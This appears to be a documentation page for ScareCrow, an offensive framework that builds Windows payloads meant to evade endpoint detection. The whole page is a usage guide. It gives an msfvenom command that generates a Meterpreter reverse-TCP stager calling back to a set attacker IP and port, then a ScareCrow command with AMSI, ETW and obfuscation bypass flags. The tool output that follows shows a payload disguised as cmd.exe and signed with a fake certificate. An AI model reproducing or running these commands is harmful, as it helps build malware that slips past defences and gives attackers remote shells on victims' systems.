Scarecrow

Overview

ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned.

Install

sudo apt install openssl osslsigncode mingw-w64 
go build ScareCrow.go

Usage

  • generate some raw shellcode

msfvenom LHOST=192.168.15.97 LPORT=8443 -p windows/x64/meterpreter/reverse_tcp  -f raw -o /tmp/stager.exe
  • run the tool with the options you want

./ScareCrow -Evasion Disk -Exec NtQueueApcThreadEx -Loader binary -O binary -domain www.google.com -encryptionmode AES -noamsi -obfu -outpath /tmp -I /tmp/stager.raw
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[!] -O not needed. This loader type uses the name of the file they are spoofing
[!] Missing Garble... Downloading it now
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Sleep Timer set for 2830 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload with the Garble's literal flag... this will take a while
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of cmd.exe: 4ffb9fdb3e6bdb08518baabc997f74e80e6680867c25b82cf4765753dceb6a6e
[*] cmd.exe moved to /tmp/

Last updated

Was this helpful?